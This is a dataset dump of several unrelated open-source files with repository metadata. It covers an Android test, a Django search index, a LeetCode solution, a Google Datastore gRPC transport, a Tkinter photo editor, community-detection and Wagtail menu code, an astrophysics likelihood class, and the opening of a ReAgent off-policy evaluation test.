self.dut = self.registerController(android_device)[0]
def testToast(self):
"""A sample test controlling Android device with sl4a. This will make a
toast message on the device screen."""
logging.info("A toast message should show up on the devce's screen.")
self.dut.sl4a.makeToast("Hello World!")
if __name__ == "__main__":
test_runner.main()
| [
"[email protected]"
] | |
c0df06b16069e147b3de2e0d270c87285e2aa0b6 | 41c5267c5b1bf6cf726dfce7f203828ab58280cc | /addons/speakers/search_indexes.py | ea8cdc9aa44bee11e7a61be39a41760d719cc403 | [] | no_license | fbates/tendenci-site | 7484616ec13a07f05be3a7a9663bca6d6800360b | 8eb0bcd8e3269e92b505e8db4f81b35442fb4ac4 | refs/heads/master | 2021-01-11T10:55:56.171005 | 2012-11-15T18:15:21 | 2012-11-15T18:15:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 559 | py | from haystack import indexes
from haystack import site
from tendenci.core.perms.indexes import TendenciBaseSearchIndex
from addons.speakers.models import Speaker
class SpeakerIndex(TendenciBaseSearchIndex):
name = indexes.CharField(model_attr='name')
company = indexes.CharField(model_attr='company', null=True)
position = indexes.CharField(model_attr='position', null=True)
track = indexes.CharField(model_attr='track', null=True)
ordering = indexes.IntegerField(model_attr='ordering', null=True)
site.register(Speaker, SpeakerIndex)
| [
"[email protected]"
] | |
587d324910fd7515c01c9051e7f77212a24b4987 | 5d302c38acd02d5af4ad7c8cfe244200f8e8f877 | /Array/1002. Find Common Characters(Easy).py | a9cdff36a75c8b1badf3cf74b7bdd55fe3ad92a2 | [] | no_license | nerohuang/LeetCode | 2d5214a2938dc06600eb1afd21686044fe5b6db0 | f273c655f37da643a605cc5bebcda6660e702445 | refs/heads/master | 2023-06-05T00:08:41.312534 | 2021-06-21T01:03:40 | 2021-06-21T01:03:40 | 230,164,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 861 | py | class Solution:
def commonChars(self, A: List[str]) -> List[str]:
        result = []
        chars = []
        count = 0
        for char in A[0]:
            chars.append(char)
        for char in chars:
            for i in range(1, len(A)):
                if char in A[i]:
                    A[i] = A[i].replace(char, '', 1)
                    count += 1
            if count == len(A) - 1:
                result.append(char)
            count = 0
        return result
##class Solution:
## def commonChars(self, A: List[str]) -> List[str]:
## answer = []
## sorted(A)
## for i,val in enumerate(A[0]):
## if all(val in string for string in A[1:]):
## for i in range(1,len(A)):
## A[i] = A[i].replace(val,'',1)
## answer.append(val)
## return answer | [
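## Alternative sketch using collections.Counter (not part of the submission):
## the & operator keeps the minimum count of each character across counters.
##from collections import Counter
##class Solution:
##    def commonChars(self, A: List[str]) -> List[str]:
##        common = Counter(A[0])
##        for word in A[1:]:
##            common &= Counter(word)
##        return list(common.elements())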
"[email protected]"
] | |
f466d9cc297956ba34da47d5efb40d14454f37a6 | 6fa701cdaa0d83caa0d3cbffe39b40e54bf3d386 | /google/datastore/v1/datastore-v1-py/google/cloud/datastore_v1/services/datastore/transports/grpc.py | 19509f59032d036f4b60e29fbfecef80da014254 | [
"Apache-2.0"
] | permissive | oltoco/googleapis-gen | bf40cfad61b4217aca07068bd4922a86e3bbd2d5 | 00ca50bdde80906d6f62314ef4f7630b8cdb6e15 | refs/heads/master | 2023-07-17T22:11:47.848185 | 2021-08-29T20:39:47 | 2021-08-29T20:39:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,280 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.cloud.datastore_v1.types import datastore
from .base import DatastoreTransport, DEFAULT_CLIENT_INFO
class DatastoreGrpcTransport(DatastoreTransport):
"""gRPC backend transport for Datastore.
Each RPC normalizes the partition IDs of the keys in its
input entities, and always returns entities with keys with
normalized partition IDs. This applies to all keys and entities,
including those in values, except keys with both an empty path
and an empty or unset partition ID. Normalization of input keys
sets the project ID (if not already set) to the project ID from
the request.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_stubs: Dict[str, Callable]
def __init__(self, *,
host: str = 'datastore.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
                ``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@classmethod
def create_channel(cls,
host: str = 'datastore.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
Raises:
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def lookup(self) -> Callable[
[datastore.LookupRequest],
datastore.LookupResponse]:
r"""Return a callable for the lookup method over gRPC.
Looks up entities by key.
Returns:
Callable[[~.LookupRequest],
~.LookupResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'lookup' not in self._stubs:
self._stubs['lookup'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/Lookup',
request_serializer=datastore.LookupRequest.serialize,
response_deserializer=datastore.LookupResponse.deserialize,
)
return self._stubs['lookup']
@property
def run_query(self) -> Callable[
[datastore.RunQueryRequest],
datastore.RunQueryResponse]:
r"""Return a callable for the run query method over gRPC.
Queries for entities.
Returns:
Callable[[~.RunQueryRequest],
~.RunQueryResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'run_query' not in self._stubs:
self._stubs['run_query'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/RunQuery',
request_serializer=datastore.RunQueryRequest.serialize,
response_deserializer=datastore.RunQueryResponse.deserialize,
)
return self._stubs['run_query']
@property
def begin_transaction(self) -> Callable[
[datastore.BeginTransactionRequest],
datastore.BeginTransactionResponse]:
r"""Return a callable for the begin transaction method over gRPC.
Begins a new transaction.
Returns:
Callable[[~.BeginTransactionRequest],
~.BeginTransactionResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'begin_transaction' not in self._stubs:
self._stubs['begin_transaction'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/BeginTransaction',
request_serializer=datastore.BeginTransactionRequest.serialize,
response_deserializer=datastore.BeginTransactionResponse.deserialize,
)
return self._stubs['begin_transaction']
@property
def commit(self) -> Callable[
[datastore.CommitRequest],
datastore.CommitResponse]:
r"""Return a callable for the commit method over gRPC.
Commits a transaction, optionally creating, deleting
or modifying some entities.
Returns:
Callable[[~.CommitRequest],
~.CommitResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'commit' not in self._stubs:
self._stubs['commit'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/Commit',
request_serializer=datastore.CommitRequest.serialize,
response_deserializer=datastore.CommitResponse.deserialize,
)
return self._stubs['commit']
@property
def rollback(self) -> Callable[
[datastore.RollbackRequest],
datastore.RollbackResponse]:
r"""Return a callable for the rollback method over gRPC.
Rolls back a transaction.
Returns:
Callable[[~.RollbackRequest],
~.RollbackResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'rollback' not in self._stubs:
self._stubs['rollback'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/Rollback',
request_serializer=datastore.RollbackRequest.serialize,
response_deserializer=datastore.RollbackResponse.deserialize,
)
return self._stubs['rollback']
@property
def allocate_ids(self) -> Callable[
[datastore.AllocateIdsRequest],
datastore.AllocateIdsResponse]:
r"""Return a callable for the allocate ids method over gRPC.
Allocates IDs for the given keys, which is useful for
referencing an entity before it is inserted.
Returns:
Callable[[~.AllocateIdsRequest],
~.AllocateIdsResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'allocate_ids' not in self._stubs:
self._stubs['allocate_ids'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/AllocateIds',
request_serializer=datastore.AllocateIdsRequest.serialize,
response_deserializer=datastore.AllocateIdsResponse.deserialize,
)
return self._stubs['allocate_ids']
@property
def reserve_ids(self) -> Callable[
[datastore.ReserveIdsRequest],
datastore.ReserveIdsResponse]:
r"""Return a callable for the reserve ids method over gRPC.
        Prevents the supplied keys' IDs from being auto-allocated
        by Cloud Datastore.
Returns:
Callable[[~.ReserveIdsRequest],
~.ReserveIdsResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'reserve_ids' not in self._stubs:
self._stubs['reserve_ids'] = self.grpc_channel.unary_unary(
'/google.datastore.v1.Datastore/ReserveIds',
request_serializer=datastore.ReserveIdsRequest.serialize,
response_deserializer=datastore.ReserveIdsResponse.deserialize,
)
return self._stubs['reserve_ids']
__all__ = (
'DatastoreGrpcTransport',
)
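if __name__ == '__main__':
    # Hedged demo, not part of the generated module: building the transport
    # uses application default credentials, and the Lookup RPC needs a real
    # GCP project; 'my-project' is a placeholder.
    transport = DatastoreGrpcTransport()
    request = datastore.LookupRequest(project_id='my-project')
    print(transport.lookup(request))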
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
749714a844151fe4c0679e06c57f2a0d1054a231 | f6786f5f51c0a71a09213e2f729766d1a04dffa2 | /두근두근_파이썬/12_PIL_Library/Challenge/353_mini_photo_shap.py | 055593ec369b0c2a9d65d294dc06ecc7d76899b9 | [] | no_license | SuperstarterJaeeun/Learn-Programming-Book | 4f075fdec386a0449da8d0d08bb8f1b6d6b2f304 | f768acfffcb20b9fc97946ca491f6ffb20671896 | refs/heads/master | 2023-07-24T07:13:24.374240 | 2021-09-06T14:56:02 | 2021-09-06T14:56:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,554 | py | import tkinter as tk
from PIL import Image, ImageTk, ImageFilter
from tkinter import filedialog as fd
im = None
tk_img = None
def open_file() :
global im, tk_img
filename = fd.askopenfilename()
im = Image.open(filename)
tk_img = ImageTk.PhotoImage(im)
canvas.create_image(250, 250, image = tk_img)
window.update()
def quit() :
window.quit()
def image_rotate() :
global im, tk_img
out = im.rotate(45)
tk_img = ImageTk.PhotoImage(out)
canvas.create_image(250, 250, image = tk_img)
window.update()
def image_blur() :
global im, tk_img
out = im.filter(ImageFilter.BLUR)
tk_img = ImageTk.PhotoImage(out)
canvas.create_image(250, 250, image = tk_img)
window.update()
def image_gray() :
global im, tk_img
out = im.convert('L')
tk_img = ImageTk.PhotoImage(out)
canvas.create_image(250, 250, image = tk_img)
window.update()
window = tk.Tk()
canvas = tk.Canvas(window, width = 500, height = 500)
canvas.pack()
menubar = tk.Menu(window)
filemenu = tk.Menu(menubar)
ipmenu = tk.Menu(menubar)
filemenu.add_command(label = "열기", command = open)
filemenu.add_command(label = "종료", command = quit)
ipmenu.add_command(label = "영상회전", command = image_rotate)
ipmenu.add_command(label = "영상흐리게", command = image_blur)
ipmenu.add_command(label = "영상흑백", command = image_gray)
menubar.add_cascade(label = "파일", menu = filemenu)
menubar.add_cascade(label = "영상처리", menu = ipmenu)
window.config(menu = menubar)
window.mainloop() | [
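# Hedged extension sketch (not in the original): a "Save" menu command
# following the same global-image pattern as the handlers above.
# def save() :
#     if im is not None :
#         filename = fd.asksaveasfilename()
#         if filename :
#             im.save(filename)
# filemenu.add_command(label = "Save", command = save)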
"[email protected]"
] | |
b06063130be1283cf92de4bb5fd9ca2e5808c674 | c52f105297f4f9bddeb31eba1615d8d04ea9742a | /tol/config/__init__.py | 2b2b20cff0fcc4e2ff9bfc4ac5ad05848da2c3c0 | [] | no_license | egdman/tol-revolve | 35b6f96bc564d9093c0041faa6558d5ed6330775 | b4050f749cb8701a219a3d8383c022e7ca2cf04e | refs/heads/master | 2020-12-25T04:28:28.561577 | 2018-05-24T16:06:53 | 2018-05-24T16:06:53 | 50,343,840 | 1 | 4 | null | 2016-02-22T18:20:22 | 2016-01-25T10:37:06 | Python | UTF-8 | Python | false | false | 70 | py | from .config import parser, str_to_address
__author__ = 'Elte Hupkes'
| [
"[email protected]"
] | |
5ca87bde902dd3bf4220c279adaa44f9c33f59ee | 5b5178d073d6b1247feab1314004bae326bfcdba | /examples/comm_example3.py | e1cf73be2bba9c04fb90e163c6f7f8f0a9e10d25 | [] | no_license | abdcelikkanat/Evaluation | 4df6512e43af17e4ec9decd54e47efb88ac11952 | 8aec5948f40b1d4601d6408a8bee5b41a77c1e35 | refs/heads/master | 2021-06-16T05:08:37.057794 | 2019-04-15T09:20:36 | 2019-04-15T09:20:36 | 135,060,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,118 | py | import sys
sys.path.append("../../deepwalk/deepwalk")
import graph as dw
import networkx as nx
from gensim.models.word2vec import Word2Vec
from graphbase import randomgraph
from sklearn.cluster import KMeans
from community_detection.community_detection import *
N = 1000
kmeans_num_of_communities = 3
if kmeans_num_of_communities == 2:
sbm_params = {}
sbm_params['sbm_N'] = N # the number of nodes
    sbm_params['sbm_P'] = [[0.7, 0.5], [0.4, 0.6]] # edge probability matrix between nodes belonging to different communities
sbm_params['sbm_block_sizes'] = [300, 700]
elif kmeans_num_of_communities == 3:
sbm_params = {}
sbm_params['sbm_N'] = N # the number of nodes
sbm_params['sbm_P'] = [[0.7, 0.3, 0.4],
[0.3, 0.6, 0.2],
                           [0.4, 0.2, 0.9]] # edge probability matrix between nodes belonging to different communities
sbm_params['sbm_block_sizes'] = [300, 500, 200]
def get_embeddings(embedding_file):
id2node = []
x = []
with open(embedding_file, 'r') as f:
f.readline()
for line in f.readlines():
tokens = line.strip().split()
id2node.append(tokens[0])
x.append([float(value) for value in tokens[1:]])
return id2node, x
g = nx.read_gml("./outputs/synthetic_n1000_c3.gml")
embedding_file = "./outputs/synthetic_n1000_c3_n80_l10_w10_k50_deepwalk_final_max.embedding"
#embedding_file = "./outputs/synthetic_n1000_c3_n80_l10_w10_k50_deepwalk_node.embedding"
id2node, x = get_embeddings(embedding_file)
kmeans = KMeans(n_clusters=kmeans_num_of_communities, random_state=0)
kmeans.fit(x)
labels = kmeans.labels_.tolist()
communities_true = nx.get_node_attributes(g, name='community')
communities_pred = {id2node[i]: [labels[i]] for i in range(len(x))}
#print(communities_true)
#print(communities_pred)
comdetect = CommunityDetection()
comdetect.set_graph(nxg=g)
number_of_communities = comdetect.detect_number_of_communities()
comdetect.set_number_of_communities(number_of_communities)
score = comdetect.nmi_score(communities_pred)
print("Score: {}".format(score))
| [
"[email protected]"
] | |
c1304d7e44ef08ace8e1237716eab05f1f68aca8 | e0980f704a573894350e285f66f4cf390837238e | /.history/menus/models_20201030152904.py | 6448852a1a6a190459f0a1fdf0323ae50934112d | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,664 | py | from django.db import models
from django_extensions.db.fields import AutoSlugField
from modelcluster.models import ClusterableModel
from modelcluster.fields import ParentalKey
from wagtail.core.models import Orderable
from wagtail.admin.edit_handlers import FieldPanel, PageChooserPanel, InlinePanel
class MenuItem(Orderable):
link_title = models.CharField(blank=True, max_length=50)
link_url = models.CharField(max_length=500, blank=True)
link_page = models.ForeignKey(
'wagtailcore.Page',
null=True,
blank=True,
related_name='+',
on_delete=models.CASCADE,
)
open_in_new_tab = models.BooleanField(
default=False,
blank=True,
)
panels = [
FieldPanel('link_title'),
FieldPanel('link_url'),
PageChooserPanel('link_page'),
FieldPanel('open_in_new_tab',),
]
page = ParentalKey('Menu', related_name='menu_items')
@property
def link(self):
if self.link_page:
return self.link_page
elif self.link_url:
return self.link_url
return '#'
@property
def title(self):
        if self.link_page and not self.link_title:
            return self.link_page.title
        elif self.link_title:
            return self.link_title
        # Fall back when neither a page nor an explicit title is set.
        return 'Missing Title'
class Menu(ClusterableModel):
title = models.CharField(max_length=100)
slug = AutoSlugField(
populate_from='title',
editable=True,
)
panels = [
FieldPanel('title'),
FieldPanel('slug'),
InlinePanel('menu_items', label='Menu Item'),
]
def __str__(self):
return self.title
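# Hedged usage sketch (assumed template-tag module, e.g. templatetags/menu_tags.py,
# not part of this file):
# from django import template
# from menus.models import Menu
# register = template.Library()
# @register.simple_tag()
# def get_menu(slug):
#     try:
#         return Menu.objects.get(slug=slug)
#     except Menu.DoesNotExist:
#         return None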
| [
"[email protected]"
] | |
5f0f06a88ed13ff447815bfff00bb6f12829139f | e3b5f5a30c9ff552d0d67308410e595f7ba50e45 | /hierarc/Likelihood/LensLikelihood/td_mag_likelihood.py | 13c0388b57e84f80cf2f6f19eb9c719eb6f51c86 | [
"BSD-3-Clause"
] | permissive | LBJ-Wade/hierarc_SGL | 2332c424d6868ce099c736eaf5fea58a9282cd0c | 1dc2be90f44f99e82ab7014f2027fbb077b14f98 | refs/heads/main | 2023-08-12T02:23:14.328741 | 2021-08-16T21:06:01 | 2021-08-16T21:06:01 | 411,586,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,553 | py | import numpy as np
from lenstronomy.Util import constants as const
from lenstronomy.Util.data_util import magnitude2cps
class TDMagLikelihood(object):
"""
likelihood of time delays and magnification likelihood
This likelihood uses linear flux units and linear lensing magnifications.
"""
def __init__(self, time_delay_measured, cov_td_measured, amp_measured, cov_amp_measured,
fermat_diff, magnification_model, cov_model, magnitude_zero_point=20):
"""
:param time_delay_measured: array, relative time delays (relative to the first image) [days]
:param cov_td_measured: 2d array, error covariance matrix of time delay measurement [days^2]
:param amp_measured: array, amplitudes of measured fluxes of image positions
:param cov_amp_measured: 2d array, error covariance matrix of the measured amplitudes
:param fermat_diff: mean Fermat potential differences (relative to the first image) in arcsec^2
:param magnification_model: mean magnification of the model prediction
:param cov_model: 2d array (length relative time delays + image amplitudes); model fermat potential differences
and lensing magnification covariances
:param magnitude_zero_point: magnitude zero point for which the image amplitudes and covariance matrix are
defined
"""
self._data_vector = np.append(time_delay_measured, amp_measured)
self._cov_td_measured = np.array(cov_td_measured)
self._cov_amp_measured = np.array(cov_amp_measured)
# check sizes of covariances matches
n_tot = len(self._data_vector)
self._n_td = len(time_delay_measured)
self._n_amp = len(amp_measured)
assert self._n_td == len(cov_td_measured)
assert self._n_amp == len(cov_amp_measured)
assert n_tot == len(cov_model)
# merge data covariance matrices from time delay and image amplitudes
self._cov_data = np.zeros((n_tot, n_tot))
self._cov_data[:self._n_td, :self._n_td] = self._cov_td_measured
self._cov_data[self._n_td:, self._n_td:] = self._cov_amp_measured
#self._fermat_diff = fermat_diff # in units arcsec^2
self._fermat_unit_conversion = const.Mpc / const.c / const.day_s * const.arcsec ** 2
#self._mag_model = mag_model
self._model_tot = np.append(fermat_diff, magnification_model)
self._cov_model = cov_model
self.num_data = n_tot
self._magnitude_zero_point = magnitude_zero_point
def log_likelihood(self, ddt, mu_intrinsic):
"""
:param ddt: time-delay distance (physical Mpc)
:param mu_intrinsic: intrinsic brightness of the source (already incorporating the inverse MST transform)
:return: log likelihood of the measured magnified images given the source brightness
"""
model_vector, cov_tot = self._model_cov(ddt, mu_intrinsic)
# invert matrix
try:
cov_tot_inv = np.linalg.inv(cov_tot)
except:
return -np.inf
# difference to data vector
delta = self._data_vector - model_vector
# evaluate likelihood
lnlikelihood = -delta.dot(cov_tot_inv.dot(delta)) / 2.
sign_det, lndet = np.linalg.slogdet(cov_tot)
lnlikelihood -= 1 / 2. * (self.num_data * np.log(2 * np.pi) + lndet)
return lnlikelihood
def _model_cov(self, ddt, mu_intrinsic):
"""
        combined covariance matrix of the data and model when marginalized over the Gaussian model uncertainties
in the Fermat potential and magnification.
:param ddt: time-delay distance (physical Mpc)
:param mu_intrinsic: intrinsic brightness of the source (already incorporating the inverse MST transform)
:return: model vector, combined covariance matrix
"""
# compute model predicted magnified image amplitude and time delay
amp_intrinsic = magnitude2cps(magnitude=mu_intrinsic, magnitude_zero_point=self._magnitude_zero_point)
model_scale = np.append(ddt * self._fermat_unit_conversion * np.ones(self._n_td),
amp_intrinsic * np.ones(self._n_amp))
model_vector = model_scale * self._model_tot
# scale model covariance matrix with model_scale vector (in quadrature)
cov_model = model_scale * (self._cov_model * model_scale).T
# combine data and model covariance matrix
cov_tot = self._cov_data + cov_model
return model_vector, cov_tot
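if __name__ == '__main__':
    # Hedged self-test, not part of the original module: arbitrary toy numbers
    # for a two-image system, chosen only to exercise the expected shapes.
    td_measured = np.array([10.0])          # one relative delay [days]
    cov_td = np.array([[1.0]])              # delay variance [days^2]
    amp_measured = np.array([100.0, 50.0])  # measured image amplitudes
    cov_amp = np.diag([25.0, 9.0])          # amplitude covariance
    fermat_diff = np.array([0.5])           # relative Fermat potential [arcsec^2]
    mag_model = np.array([4.0, 2.0])        # model magnifications
    cov_model = np.diag([0.01, 0.1, 0.05])  # (n_td + n_amp) model covariance
    likelihood = TDMagLikelihood(td_measured, cov_td, amp_measured, cov_amp,
                                 fermat_diff, mag_model, cov_model)
    print(likelihood.log_likelihood(ddt=5000.0, mu_intrinsic=17.0))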
| [
"[email protected]"
] | |
8301789d83ca70ea4d0b557b011359a5b8e1ed37 | 956e39e6bcc2c22fec9baa6f7c732c40a8da4ef9 | /reagent/test/evaluation/test_ope_integration.py | 974605113e3093b9380b024747c1cdbb84c3fedf | [
"BSD-3-Clause"
] | permissive | justcherie/ReAgent | 5d3c62bd2fb1cc565417b31cc8e22a1473d134dc | f6b737b3d49660c48087b311f591fd24fb025211 | refs/heads/master | 2023-03-19T14:35:32.805656 | 2021-03-08T17:28:09 | 2021-03-08T17:30:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,467 | py | import logging
import random
import unittest
import numpy as np
import torch
from reagent import types as rlt
from reagent.evaluation.evaluation_data_page import EvaluationDataPage
from reagent.evaluation.ope_adapter import (
OPEstimatorAdapter,
SequentialOPEstimatorAdapter,
)
from reagent.ope.estimators.contextual_bandits_estimators import (
DMEstimator,
DoublyRobustEstimator,
IPSEstimator,
SwitchDREstimator,
SwitchEstimator,
)
from reagent.ope.estimators.sequential_estimators import (
DoublyRobustEstimator as SeqDREstimator,
EpsilonGreedyRLPolicy,
RandomRLPolicy,
RLEstimatorInput,
)
from reagent.ope.estimators.types import Action, ActionSpace
from reagent.ope.test.envs import PolicyLogGenerator
from reagent.ope.test.gridworld import GridWorld, NoiseGridWorldModel
from reagent.ope.trainers.rl_tabular_trainers import (
DPTrainer,
DPValueFunction,
TabularPolicy,
)
from reagent.test.evaluation.test_evaluation_data_page import (
FakeSeq2SlateRewardNetwork,
FakeSeq2SlateTransformerNet,
)
logger = logging.getLogger(__name__)
def rlestimator_input_to_edp(
input: RLEstimatorInput, num_actions: int
) -> EvaluationDataPage:
mdp_ids = []
logged_propensities = []
logged_rewards = []
action_mask = []
model_propensities = []
model_values = []
for mdp in input.log:
mdp_id = len(mdp_ids)
for t in mdp:
mdp_ids.append(mdp_id)
logged_propensities.append(t.action_prob)
logged_rewards.append(t.reward)
assert t.action is not None
action_mask.append(
[1 if x == t.action.value else 0 for x in range(num_actions)]
)
assert t.last_state is not None
model_propensities.append(
[
input.target_policy(t.last_state)[Action(x)]
for x in range(num_actions)
]
)
assert input.value_function is not None
model_values.append(
[
input.value_function(t.last_state, Action(x))
for x in range(num_actions)
]
)
return EvaluationDataPage(
mdp_id=torch.tensor(mdp_ids).reshape(len(mdp_ids), 1),
logged_propensities=torch.tensor(logged_propensities).reshape(
(len(logged_propensities), 1)
),
logged_rewards=torch.tensor(logged_rewards).reshape((len(logged_rewards), 1)),
action_mask=torch.tensor(action_mask),
model_propensities=torch.tensor(model_propensities),
model_values=torch.tensor(model_values),
sequence_number=torch.tensor([]),
model_rewards=torch.tensor([]),
